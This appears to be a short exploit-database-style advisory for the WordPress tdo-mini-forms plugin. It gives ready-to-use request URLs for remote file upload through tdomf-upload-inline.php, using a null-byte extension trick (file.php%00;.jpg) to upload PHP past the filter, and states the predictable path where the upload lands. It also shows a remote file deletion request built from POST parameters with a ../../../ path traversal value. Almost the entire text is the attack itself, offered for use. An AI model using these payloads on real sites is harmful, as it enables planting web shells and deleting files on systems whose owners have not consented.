wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities ------------------------------------------------------------ wordpress tdo-mini-forms plugin (remote file upload/remote file deletion) Vulnerabilities Auther : Cold z3ro , www.hackteach.org , www.s3curi7y.com Anonymous => You are the man # Remote file upload : wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index= file extension : file.php%00;.jpg uploaded path : wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg Example to uploaded path : wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg # Remote file Deletion => Note : useing Any http POST header modifier . tdomf_form_id = 1; deletefile[] = 1; filepath = $varibale ( wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg ) index = NULL Example to result : wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index= Eof;